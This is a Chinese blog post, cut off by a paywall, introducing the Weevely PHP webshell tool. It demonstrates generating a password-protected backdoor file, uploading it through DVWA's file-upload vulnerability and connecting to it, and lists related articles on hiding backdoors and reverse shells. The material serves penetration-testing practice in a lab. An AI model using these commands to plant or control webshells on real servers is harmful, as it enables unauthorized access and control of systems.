Web后门工具weevley

最新推荐文章于 2023-03-05 16:20:32 发布
最新推荐文章于 2023-03-05 16:20:32 发布
阅读量705 收藏 3
点赞数
分类专栏: kaliTools
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freegotocpp/article/details/83510641
版权

weevley简介

Weevely是一款开源项目.只支持(PHP) Webshell,可以模拟类似Telnet的连接,Weevely支持HTTP和SOCKS代理并使用Tor匿名网络。开源 https://github.com/epinna/weevely3

演示

靶机 dvwa  Vulnerability: File Upload low

生成后门

weevely generate <password 设置密码> <path 路径可以指定绝对路径> 
weevely generate 123456 test.php
Generated 'test.php' with password '123456' of 742 byte size.

生成的test.php后门上传到服务器  复制URL链接

weevely http://192.168.1.108/dvwa/hackable/uploads/test.php 123456 
[+] weevely 3.6.2

[+] Target:	192.168.1.108
[+] Session:	/root/.weevely/sessions/192.168.1.108/test_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
最低0.47元/天 解锁文章
zhaji001
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web后门一键扫描WebShellKiller.zip
04-10
Web后门一键扫描WebShellKiller
文件包含笔记
qq_32812063的博客
11-28 564
文件包含
Weevely(php菜刀)工具使用简介
RickGray
08-02 2722
Weevely工具使用记录 -前言 weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。 项目地址:https://github.com/epinna/Weevely 下面就针
weevely工具使用
淡巴枯的博客
05-23 6501
weevely工具使用 目录一. 关于weevely二. 安装weevely三. 使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
kali下的webshell工具-Weevely
weixin_30457465的博客
03-11 649
Weevely ------------------------------------------------ 主要特点: · 隐蔽的类终端的PHP webshell · 30多个管理模块 o 执行系统命令、浏览文件系统 o 检查目标服务器的常见配置错误 o 基于现有连接,创建正向、反向的TCP shell连接 o 通过目标...
weevely基本使用
BeatRex的博客
11-22 8651
一、weevely使用 weevely的功能同之前学习过的中国菜刀,但其功能更加丰富且在linux和windows下都可以运行。kali linux环境下已集成weevely。分weevely生成shell文件、weevely连接后台、weevely信息探测、weevely文件操作、weevely审计这几块来学习。 以生成一个名为weevelyshell的shell并上传连接的案例进行学习。 首先...
CTF工具WEB.zip
10-07
【标题】:CTF工具WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
隐藏web后门的方法
08-18
亲 还在为后门无法隐藏而烦恼吗 这里提供了两个后门隐藏的办法 解除您的后顾之忧
web木马后门查杀工具.zip
11-15
web木马后门查杀工具
rootkit后门工具
06-09
在IT安全领域,"rootkit后门工具"是一种高级的恶意软件技术,它主要用于非法获取对目标系统的控制权并保持隐蔽。Rootkit是黑客用来隐藏其活动和存在的工具集,通常包括一系列模块,如钩子引擎、进程隐藏、文件系统...
制作WEBSHELL高级后门附带工具
11-02
制作高级ASP木马后门教程 让你多多收shell 制作自己的WEBSHELL收信箱子库
CentOS7_Web_AXMPP_DVWA服务器搭建
zhaji001
07-30 652
CentoS7 搭建的DVWA    windows 搭建更简单  主要一点就是 JDK环境装上  因为tomcat 这只猫 需要JDK环境 CentOS 官方下载地址:https://www.centos.org/    下载的标准版 我在另一台PC上搭建    使用的VirtualBox虚拟机    网络配置是选择桥接网卡  和我主机同一网络下 CentOS最好不要装图形界面 不然耗费...
【安全牛学习笔记】WEBSHELL
edu_aqniu的博客
09-30 1175
WEBSHELL                                           中国菜刀: http://www.maicaidao.co/                       可能被IDS、AV、WAF、扫描器软件发现查杀       WeBaCoo(WEB backdoor Cookie)                   
weevely生成木马并反向shell连接msf
小刚的博客
05-13 3672
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 weevely实验环境weevely介绍使用流程1,使用weevely生成php木马文件2,将木马文件上传到被攻击web服务器3,使用weevely连接木马文件4,控制参数5,反向shell连接msf总结 今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境 1.p.
window权限维持——iis后门
mingyqf的博客
02-18 655
原理可参考:https://www.cnblogs.com/zaqzzz/p/12942439.html 步骤可参考:https://longwaer.blog.csdn.net/article/details/122446348 web服务器上一般都 支持net 所以可以考虑利用net iis做一个后门 项目地址 https://github.com/WBGlIl/IIS_backdoor 在网站目录下新建一个bin文件夹 这个文件夹 存放dll集 把IIS_backdoor_dll.dll存放在这里面
渗透测试Web利器篇之Weevely介绍、安装以及简单使用
lzp_5257的博客
04-20 3245
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 一、Weevely介绍 Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式 构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性 在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资 源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能 下载地址:https://github.com/epinna/weevely3.
Webshell管理工具
ssslq的博客
03-05 2091
基本管理工具
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门
热门推荐
weixin_43263566的博客
01-25 1万+
Webshell(网页后门
php源码扫描后门工具
最新发布
01-23
PHP源码扫描后门工具是一种可以帮助开发者检测PHP源代码中是否存在后门工具。这种工具通常会使用静态代码分析技术,对PHP源码进行深入扫描和分析,以便找出可能存在的后门代码或者安全漏洞。 这种工具的工作原理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值